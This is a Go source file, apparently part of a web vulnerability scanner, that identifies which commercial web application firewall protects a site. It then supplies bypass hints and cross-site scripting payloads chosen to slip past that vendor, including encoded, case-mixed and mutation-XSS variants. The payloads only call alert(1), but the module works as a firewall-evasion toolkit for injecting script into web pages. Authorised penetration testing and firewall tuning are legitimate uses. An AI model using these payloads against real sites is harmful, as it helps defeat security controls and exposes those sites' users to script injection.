package main

import (
	"fmt"
	"strings"
	"sync"
)

// =========================================================
// WAF Fingerprinting + Bypass Strategy
// =========================================================

// WAFInfo — detected WAF details
type WAFInfo struct {
	Detected   bool     `json:"detected"`
	Vendor     string   `json:"vendor"`
	Confidence int      `json:"confidence"` // 0-100
	Evidence   []string `json:"evidence"`
	BypassHint []string `json:"bypass_hint"` // suggested techniques
}

// wafSignature — one vendor's detection rules
type wafSignature struct {
	Vendor         string
	HeaderKeys     []string // header names that indicate this WAF
	HeaderValues   []string // header values (substring, lowercase)
	BodySignatures []string // body substrings (lowercase)
	CookieNames    []string // cookie names
	BypassHints    []string // techniques known to work
}

// =========================================================
// WAF Signature Database
// =========================================================
var wafDB = []wafSignature{
	{
		Vendor: "Cloudflare",
		HeaderKeys:   []string{"CF-RAY", "CF-Cache-Status", "CF-Request-ID"},
		HeaderValues: []string{"cloudflare"},
		BodySignatures: []string{
			"cloudflare", "cf-error", "attention required! | cloudflare",
			"ray id", "checking your browser",
		},
		CookieNames: []string{"__cfduid", "__cf_bm", "cf_clearance"},
		BypassHints: []string{
			"whitespace mutations (%0a, %09, %0c)",
			"case randomization (<ScRiPt>)",
			"unicode escapes (\\u003c)",
			"HTML entity encode (&#60;)",
			"event handler alternatives (ontoggle, onbegin)",
		},
	},
	{
		Vendor: "Akamai",
		HeaderKeys:   []string{"X-Akamai-Transformed", "X-Akamai-Request-ID", "Akamai-GRN"},
		HeaderValues: []string{"akamai"},
		BodySignatures: []string{
			"akamai", "reference #18", "reference #9",
			"access denied", "akamai bot manager",
		},
		CookieNames: []string{"ak_bmsc", "bm_sz", "akamai_"},
		BypassHints: []string{
			"case randomization",
			"uncommon event handlers",
			"double URL encoding",
			"comment injection (<scr/**/ipt>)",
		},
	},
	{
		Vendor: "AWS WAF",
		HeaderKeys:   []string{"X-Amzn-RequestId", "X-Amz-Cf-Id"},
		HeaderValues: []string{"awselb", "aws"},
		BodySignatures: []string{
			"aws waf", "request blocked", "blocked by aws",
		},
		CookieNames: []string{"awsalb", "awsalbcors"},
		BypassHints: []string{
			"unicode escapes",
			"HTML entity encoding",
			"attribute without quotes",
			"split payload across params",
		},
	},
	{
		Vendor: "Imperva Incapsula",
		HeaderKeys:   []string{"X-Iinfo", "X-CDN"},
		HeaderValues: []string{"incapsula", "imperva"},
		BodySignatures: []string{
			"incapsula", "imperva", "_incap_ses",
			"request unsuccessful", "incident id",
		},
		CookieNames: []string{"incap_ses_", "visid_incap_", "nlbi_"},
		BypassHints: []string{
			"rare event handlers",
			"whitespace comments",
			"alt attributes",
			"mXSS payloads",
		},
	},
	{
		Vendor: "Sucuri",
		HeaderKeys:   []string{"X-Sucuri-ID", "X-Sucuri-Cache"},
		HeaderValues: []string{"sucuri"},
		BodySignatures: []string{
			"sucuri", "cloudproxy", "access denied - sucuri website firewall",
		},
		CookieNames: []string{"sucuri_cloudproxy_uuid_"},
		BypassHints: []string{
			"case randomization",
			"unicode escapes",
			"HTML entity encode",
		},
	},
	{
		Vendor: "F5 BIG-IP",
		HeaderKeys:   []string{"X-WA-Info", "X-Cnection"},
		HeaderValues: []string{"big-ip", "f5"},
		BodySignatures: []string{
			"the requested url was rejected", "f5 networks",
			"big-ip", "please consult with your administrator",
		},
		CookieNames: []string{"bigipserver", "ts01", "f5_cspm"},
		BypassHints: []string{
			"double URL encoding",
			"mixed case",
			"unusual whitespace",
			"HTML5 tags",
		},
	},
	{
		Vendor: "ModSecurity",
		HeaderKeys:   []string{"X-Mod-Security-Message"},
		HeaderValues: []string{"mod_security", "modsecurity"},
		BodySignatures: []string{
			"mod_security", "modsecurity", "not acceptable",
			"406 not acceptable", "this error was generated by mod_security",
		},
		CookieNames: []string{},
		BypassHints: []string{
			"case randomization",
			"comment injection",
			"double encoding",
			"split payload",
			"OOB via expression()",
		},
	},
	{
		Vendor: "Wordfence",
		HeaderKeys:   []string{},
		HeaderValues: []string{"wordfence"},
		BodySignatures: []string{
			"wordfence", "generated by wordfence",
			"your access to this site has been limited",
		},
		CookieNames: []string{"wfvt_"},
		BypassHints: []string{
			"case randomization",
			"HTML5 event handlers",
			"alt syntax (alert`1`)",
		},
	},
	{
		Vendor: "Barracuda",
		HeaderKeys:   []string{"X-Barracuda-URL"},
		HeaderValues: []string{"barracuda"},
		BodySignatures: []string{
			"barracuda", "barra_counter_session",
		},
		CookieNames: []string{"barra_counter_session", "bnc_"},
		BypassHints: []string{
			"double encoding",
			"HTML entity encode",
			"unusual whitespace",
		},
	},
	{
		Vendor: "Fortinet FortiWeb",
		HeaderKeys:   []string{},
		HeaderValues: []string{"fortiweb"},
		BodySignatures: []string{
			"fortiweb", ".fgd_icon", "fortigate",
		},
		CookieNames: []string{"fortiwafsid", "cookiesession1"},
		BypassHints: []string{
			"case randomization",
			"uncommon tags",
			"encoding tricks",
		},
	},
}

// =========================================================
// DetectWAF — analyze response headers + body + cookies
// =========================================================
func DetectWAF(statusCode int, headers map[string]string, body string) WAFInfo {
	info := WAFInfo{
		Detected:   false,
		Vendor:     "unknown",
		Confidence: 0,
		Evidence:   []string{},
		BypassHint: []string{},
	}

	if len(headers) == 0 && body == "" {
		return info
	}

	// Normalize
	headersLower := make(map[string]string)
	for k, v := range headers {
		headersLower[strings.ToLower(k)] = strings.ToLower(v)
	}
	bodyLower := strings.ToLower(body)

	bestScore := 0
	bestVendor := ""
	var bestEvidence []string
	var bestHints []string

	for _, sig := range wafDB {
		score := 0
		evidence := []string{}

		// 1. Header key match (strong signal — +40)
		for _, hk := range sig.HeaderKeys {
			if _, ok := headersLower[strings.ToLower(hk)]; ok {
				score += 40
				evidence = append(evidence, "header:"+hk)
			}
		}

		// 2. Header value match (+30)
		for _, hv := range sig.HeaderValues {
			for k, v := range headersLower {
				if strings.Contains(v, hv) {
					score += 30
					evidence = append(evidence, fmt.Sprintf("header:%s=%s", k, hv))
					break
				}
			}
		}

		// 3. Body signatures (+25 each, max 50)
		bodyHits := 0
		for _, bs := range sig.BodySignatures {
			if strings.Contains(bodyLower, bs) {
				score += 25
				bodyHits++
				evidence = append(evidence, "body:"+bs)
				if bodyHits >= 2 {
					break
				}
			}
		}

		// 4. Cookie names (+20)
		if cookieHeader, ok := headersLower["cookie"]; ok {
			for _, cn := range sig.CookieNames {
				if strings.Contains(cookieHeader, strings.ToLower(cn)) {
					score += 20
					evidence = append(evidence, "cookie:"+cn)
					break
				}
			}
		}

		// 5. Status-based generic signal (403/406/429)
		if statusCode == 403 || statusCode == 406 || statusCode == 429 {
			if score > 0 {
				score += 10
				evidence = append(evidence, fmt.Sprintf("status:%d", statusCode))
			}
		}

		if score > bestScore {
			bestScore = score
			bestVendor = sig.Vendor
			bestEvidence = evidence
			bestHints = sig.BypassHints
		}
	}

	// Threshold
	if bestScore >= 25 {
		info.Detected = true
		info.Vendor = bestVendor
		info.Evidence = bestEvidence
		info.BypassHint = bestHints
		if bestScore > 100 {
			bestScore = 100
		}
		info.Confidence = bestScore
	} else if statusCode == 403 || statusCode == 406 || statusCode == 429 {
		// Generic block detected but vendor unknown
		info.Detected = true
		info.Vendor = "unknown (generic block)"
		info.Confidence = 30
		info.Evidence = []string{fmt.Sprintf("status:%d", statusCode)}
		info.BypassHint = []string{
			"try case randomization",
			"try encoding variants",
			"try uncommon event handlers",
		}
	}

	return info
}

// =========================================================
// GetBypassPayloads — return WAF-specific payload variants
// =========================================================
func GetBypassPayloads(vendor string) []string {
	v := strings.ToLower(vendor)

	switch {
	case strings.Contains(v, "cloudflare"):
		return []string{
			"<svg%0aonload=alert(1)>",
			"<svg%09onload=alert(1)>",
			"<svg%0Conload=alert(1)>",
			"<scr\\x69pt>alert(1)</scr\\x69pt>",
			"<img src=x onerror=alert`1`>",
			"<svg><animate onbegin=alert(1) attributeName=x dur=1s>",
			"<details open ontoggle=alert(1)>",
			"<math><mtext><table><mglyph><style><!--</style><img src=x onerror=alert(1)>",
		}

	case strings.Contains(v, "akamai"):
		return []string{
			"<img src=x onerror=alert`1`>",
			"<svg/onload=alert(1)//>",
			"<svg onload=alert(1) id=x>",
			"<script>alert(1)//</script>",
			"<body onload=alert(1)>",
		}

	case strings.Contains(v, "aws"):
		return []string{
			"<svg onload=alert(1)>",
			"<img src=x onerror=alert(1)>",
			"\\u003cscript\\u003ealert(1)\\u003c/script\\u003e",
			"<script>alert(1)//</script>",
		}

	case strings.Contains(v, "imperva") || strings.Contains(v, "incapsula"):
		return []string{
			"<svg><animate onbegin=alert(1)>",
			"<details open ontoggle=alert(1)>",
			"<img src=x onerror=alert(1)>",
			"<video><source onerror=alert(1)>",
		}

	case strings.Contains(v, "sucuri"):
		return []string{
			"<svg/onload=alert(1)>",
			"<svg%0aonload=alert(1)>",
			"<img src=x onerror=alert`1`>",
			"<ScRiPt>alert(1)</sCrIpT>",
		}

	case strings.Contains(v, "f5") || strings.Contains(v, "big-ip"):
		return []string{
			"<svg/onload=alert(1)>",
			"<img/src=x/onerror=alert(1)>",
			"<svg%09onload=alert(1)>",
			"<script>alert(1)//</script>",
		}

	case strings.Contains(v, "modsecurity") || strings.Contains(v, "mod_security"):
		return []string{
			"<svg/onload=alert(1)//>",
			"<img/src=x/onerror=alert(1)>",
			"<ScRiPt>alert(1)</sCrIpT>",
			"<script>alert(/1/)</script>",
			"<script>\\u0061lert(1)</script>",
		}

	case strings.Contains(v, "wordfence"):
		return []string{
			"<svg/onload=alert`1`>",
			"<img src=x onerror=alert`1`>",
			"<details open ontoggle=alert(1)>",
		}

	case strings.Contains(v, "barracuda"):
		return []string{
			"<svg%0aonload=alert(1)>",
			"<img src=x onerror=alert(1)>",
			"<script>alert(1)//</script>",
		}

	case strings.Contains(v, "forti") || strings.Contains(v, "fortinet"):
		return []string{
			"<svg/onload=alert(1)>",
			"<img src=x onerror=alert`1`>",
			"<details open ontoggle=alert(1)>",
		}

	default:
		// Generic
		return []string{
			"<svg/onload=alert(1)//>",
			"<img/src=x/onerror=alert(1)>",
			"<svg\\tonload=alert(1)>",
			"<svg\\nonload=alert(1)>",
			"<img src=x onerror=alert(1)////>",
			"<ScRiPt>alert(1)</sCrIpT>",
		}
	}
}

// =========================================================
// ScoreWAFResponse — quick heuristic for a single response
// =========================================================
func ScoreWAFResponse(statusCode int, body string) (bool, string) {
	bodyLower := strings.ToLower(body)

	// Very common block messages
	blockMarkers := []string{
		"access denied",
		"request blocked",
		"request rejected",
		"security policy",
		"not acceptable",
		"forbidden",
		"web application firewall",
		"your request has been blocked",
		"blocked by",
	}
	for _, m := range blockMarkers {
		if strings.Contains(bodyLower, m) {
			return true, m
		}
	}

	// Status
	if statusCode == 403 || statusCode == 406 || statusCode == 429 || statusCode == 503 {
		return true, fmt.Sprintf("status_%d", statusCode)
	}

	return false, ""
}

// =========================================================
// WAF Cache — avoid re-fingerprinting same host
// =========================================================
var (
	wafCache   = make(map[string]WAFInfo)
	wafCacheMu sync.RWMutex
)

func CacheWAF(host string, info WAFInfo) {
	wafCacheMu.Lock()
	defer wafCacheMu.Unlock()
	wafCache[host] = info
}

func GetCachedWAF(host string) (WAFInfo, bool) {
	wafCacheMu.RLock()
	defer wafCacheMu.RUnlock()
	info, ok := wafCache[host]
	return info, ok
}

// =========================================================
// FormatWAFInfo — pretty string for logs/reports
// =========================================================
func FormatWAFInfo(info WAFInfo) string {
	if !info.Detected {
		return "No WAF detected"
	}
	return fmt.Sprintf("WAF: %s (confidence: %d%%) | evidence: %s | bypass: %s",
		info.Vendor,
		info.Confidence,
		strings.Join(info.Evidence, ", "),
		strings.Join(info.BypassHint, "; "),
	)
}